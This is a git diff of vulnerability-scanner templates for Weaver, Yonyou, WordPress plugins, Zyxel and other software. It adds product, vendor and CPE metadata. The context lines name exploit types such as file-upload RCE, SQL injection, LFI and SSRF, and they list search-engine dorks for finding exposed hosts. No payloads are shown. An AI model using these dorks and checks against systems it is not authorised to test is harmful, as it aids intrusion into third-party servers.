"999999999" diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml index f77702bd2f..9f6611d50a 100755 --- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-office,oa,sqli + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-group-xml-sqli" @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e520e096b9c8cdad4c8c78447d8bfb96088bfa3c937b57b15dd40914d7ba834e0220136edb9f4931e4d48788270d2f76b8333475d5774ab70dc2a7c03f3fce85b649:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index 7500c42579..eb49c377f7 100755 --- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml @@ -11,7 +11,11 @@ info: verified: true max-request: 3 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-office,oa,instrusive,rce,intrusive + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" @@ -53,4 +57,4 @@ http: - "status_code_1 == 200" - "status_code_3 == 200 && contains(body_3,'{{string}}')" condition: and -# digest: 490a004630440220790332461df03baf07989c298e9db35de0c2cb4167ab3fe056e411e36a9a0bb102207a458e4f016d324d92d1ec64d8f6cb99afd2e9cdbb5b304485c5d504bcfe1322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220790332461df03baf07989c298e9db35de0c2cb4167ab3fe056e411e36a9a0bb102207a458e4f016d324d92d1ec64d8f6cb99afd2e9cdbb5b304485c5d504bcfe1322:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml index 04c63cc834..f69bda6c3c 100755 --- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml @@ -13,7 +13,11 @@ info: max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: weaver,ecology,fileupload,intrusive + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* variables: num1: "{{rand_int(40000, 50000)}}" num2: "{{rand_int(40000, 50000)}}" diff --git a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml index 85dad0d119..3b282147e9 100644 --- a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml +++ b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: ecology,weaver,oa,lfi + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml index ce0e89d493..10e7a1756d 100755 --- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 2 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-office,oa,rce,intrusive,fileupload + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-office-server-file-upload" @@ -52,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203127ce2e098b2266d9481c1c61ac61144546c744a6df4106dd3ceebee2e93767022100802af24d36ee037cd653efa73e917ade93c76cc561d9572fb27f38bfffdd04b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203127ce2e098b2266d9481c1c61ac61144546c744a6df4106dd3ceebee2e93767022100802af24d36ee037cd653efa73e917ade93c76cc561d9572fb27f38bfffdd04b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml index 4e1aa20a48..2382dac256 100755 --- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-cology,oa,lfi + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml index 5d042369f3..1c9b8ab04a 100755 --- a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-E-Weaver" + product: e-cology + vendor: weaver tags: ecology,weaver,oa,lfi + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml index 36d8cc98dd..0283b08fe2 100755 --- a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml +++ b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-E-Weaver" + product: e-cology + vendor: weaver tags: weaver,e-cology,oa,lfi + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index a16b362c11..061a4b4733 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 3 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-office,oa,intrusive,rce,fileupload + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "weaver-uploadify-file-upload" @@ -51,4 +55,4 @@ http: part: body_3 words: - '{{md5(string)}}' -# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml index b3e4dd4341..07d85433e7 100755 --- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml @@ -12,7 +12,11 @@ info: metadata: max-request: 3 fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,fileupload,intrusive + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_base(5))}}" string: "{{randstr}}" diff --git a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml index 9861f40195..0ffd2d99a6 100755 --- a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml +++ b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="泛微-EOffice" + product: e-office + vendor: weaver tags: weaver,e-office,oa,unauth + classification: + cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml index 89ecb10f3f..c610f533c0 100644 --- a/http/vulnerabilities/wechat/wechat-info-leak.yaml +++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="wework_admin.normal_layout" + product: wechat + vendor: tencent tags: wechat,exposure,tencent + classification: + cpe: cpe:2.3:a:tencent:wechat:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml index 9c07ff965f..5a4ac79bdf 100644 --- a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml +++ b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:analytify:analytify_-_google_analytics_dashboard:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 google-query: inurl:/wp-content/plugins/wp-analytify + product: analytify_-_google_analytics_dashboard + vendor: analytify tags: wp,wordpress,analytify,wpscan,wp-plugin,xss http: diff --git a/http/vulnerabilities/wordpress/booked-export-csv.yaml b/http/vulnerabilities/wordpress/booked-export-csv.yaml index 4bcd32f37c..9971d2242a 100644 --- a/http/vulnerabilities/wordpress/booked-export-csv.yaml +++ b/http/vulnerabilities/wordpress/booked-export-csv.yaml @@ -17,8 +17,12 @@ info: fofa-query: "wp-content/plugins/booked/" publicwww-query: "/wp-content/plugins/booked/" google-query: inurl:"/wp-content/plugins/booked/" + product: booked + vendor: twinkletoessoftware tags: wordpress,wpscan,wp-plugin,wp,booked,bypass + classification: + cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml index b86c8ad0f2..0ed18d7f49 100644 --- a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/photo-gallery" + product: photo_gallery + vendor: 10web tags: wpscan,wp,wp-plugin,wordpress,xss,photo-gallery,authenticated + classification: + cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -45,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml index d8eee65d19..6b5469fa8f 100644 --- a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml @@ -15,8 +15,12 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + product: gallery_photoblocks + vendor: wpchill tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss + classification: + cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/wordpress/shortcode-lfi.yaml b/http/vulnerabilities/wordpress/shortcode-lfi.yaml index d3d77df2df..ec7d8c22f3 100644 --- a/http/vulnerabilities/wordpress/shortcode-lfi.yaml +++ b/http/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:halulu:simple-download-button-shortcode:*:*:*:*:wordpress:*:*:* metadata: max-request: 1 google-query: inurl:wp/wp-content/force-download.php + product: simple-download-button-shortcode + vendor: halulu tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin http: diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index 955028d8a5..c85cd27a5a 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 fofa-query: body="oembed" && body="wp-" + product: wordpress + vendor: wordpress tags: wordpress,ssrf,oast,oembed + classification: + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* http: - raw: - | @@ -33,4 +37,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml index 1459b7f9ce..edfe479688 100644 --- a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml +++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml @@ -17,7 +17,11 @@ info: max-request: 2 publicwww-query: /wp-content/plugins/gallery-plugin/ google-query: inurl:/wp-content/plugins/gallery-plugin/ + product: gallery + vendor: bestwebsoft tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive + classification: + cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:* variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml index 77a8115984..18eccfad20 100644 --- a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 google-query: inurl:/wp-content/plugins/mstore-api/ + product: mstore_api + vendor: inspireui tags: wordpress,listing,wp-plugin + classification: + cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:wordpress:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml index 812d486da6..8522a3009a 100644 --- a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml @@ -14,10 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 + cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/themes/realestate-7/" + product: real_estate_7 + vendor: contempothemes tags: packetstorm,wordpress,wp-theme,wp,xss,realestate http: diff --git a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml index 52d75c141e..d7f3288bc3 100644 --- a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml +++ b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/social-warfare/" + product: social_warfare + vendor: warfareplugins tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce + classification: + cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index 33e5cb58b6..52adab9487 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -15,8 +15,12 @@ info: verified: true max-request: 2 publicwww-query: /wp-content/plugins/wp-statistics/ + product: wp_statistics + vendor: veronalabs tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp + classification: + cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: @@ -43,4 +47,4 @@ http: - 'duration>=7' - 'status_code == 500' condition: and -# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml index a1a731a66a..5140a12ab9 100644 --- a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml +++ b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml @@ -14,8 +14,12 @@ info: max-request: 1 publicwww-query: /wp-content/plugins/superstorefinder-wp/ google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" + product: super_store_finder + vendor: superstorefinder tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig + classification: + cpe: cpe:2.3:a:superstorefinder:super_store_finder:*:*:*:*:wordpress:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/wordpress/wp-sym404.yaml b/http/vulnerabilities/wordpress/wp-sym404.yaml index e2d619ba73..0d3db3de75 100644 --- a/http/vulnerabilities/wordpress/wp-sym404.yaml +++ b/http/vulnerabilities/wordpress/wp-sym404.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 google-query: inurl:"/wp-includes/sym404/" + product: wp_extra + vendor: wpvnteam tags: wordpress,listing,wp,exposure + classification: + cpe: cpe:2.3:a:wpvnteam:wp_extra:*:*:*:*:wordpress:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml index 4f95c2069a..f529d79221 100644 --- a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 google-query: "inurl:/wp-content/plugins/wptouch" + product: wptouch + vendor: bravenewcode tags: wp-plugin,wp,packetstorm,wptouch,unauth,redirect,wordpress + classification: + cpe: cpe:2.3:a:bravenewcode:wptouch:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml index 3dd45c2338..64e3ff5995 100644 --- a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml +++ b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 google-query: inurl:"/author-sitemap.xml" + product: yoast_seo + vendor: yoast tags: wp,wp-plugin,wordpress,username,disclosure + classification: + cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index 996b6b2dca..efb620b81d 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: icon_hash="1085941792" + product: ufida-nc + vendor: yonyou tags: yonyou,nc,intrusive,fileupload + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml index 9c9651a8bb..0b8c7e5912 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="Yonyou-UFIDA-NC" + product: ufida-nc + vendor: yonyou tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml index 374ae31b0d..15d56ecf47 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 fofa-query: icon_hash="1085941792" + product: ufida-nc + vendor: yonyou tags: yonyou,intrusive,fileupload + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index 06d784f482..740d839410 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -13,7 +13,11 @@ info: verified: true max-request: 2 fofa-query: app="用友-UFIDA-NC + product: ufida-nc + vendor: yonyou tags: yonyou,intrusive,ufida,fileupload + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* variables: v1: "{{rand_int(1,100)}}" diff --git a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml index 357b6d2081..9e983bce04 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="用友-UFIDA-NC + product: ufida-nc + vendor: yonyou tags: yonyou,nc,exposure + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml index daeecbc08e..904639a33b 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 fofa-query: app="用友-UFIDA-NC + product: ufida-nc + vendor: yonyou tags: yonyou,rce,deserialization + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml index 217e6d4453..bae34577e0 100644 --- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="用友-移动系统管理" + product: ufida-nc + vendor: yonyou tags: yonyou,ufida,lfi + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/zend/zend-v1-xss.yaml b/http/vulnerabilities/zend/zend-v1-xss.yaml index 8bc04a5820..dfaa454200 100644 --- a/http/vulnerabilities/zend/zend-v1-xss.yaml +++ b/http/vulnerabilities/zend/zend-v1-xss.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 google-query: inurl:"/tests/Zend/Http/" + product: zend_framework + vendor: zend tags: zend,zendframework,xss + classification: + cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml index dce38605bc..d70daf904c 100644 --- a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml +++ b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: title:"USG FLEX" + product: usg1000_firmware + vendor: zyxel tags: misconfig,unauth,zyxel,ztp,rce,oast + classification: + cpe: cpe:2.3:o:zyxel:usg1000_firmware:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml index a79ec2a893..5a1a4c63b8 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" + product: zzzcms + vendor: zzzcms tags: zzzcms,info,disclosure + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml index c1038807be..5a9dc06e87 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml @@ -12,7 +12,11 @@ info: max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" + product: zzzcms + vendor: zzzcms tags: zzzcms,ssrf,oast + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* variables: filename: "{{to_lower(rand_text_alpha(4))}}" @@ -42,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 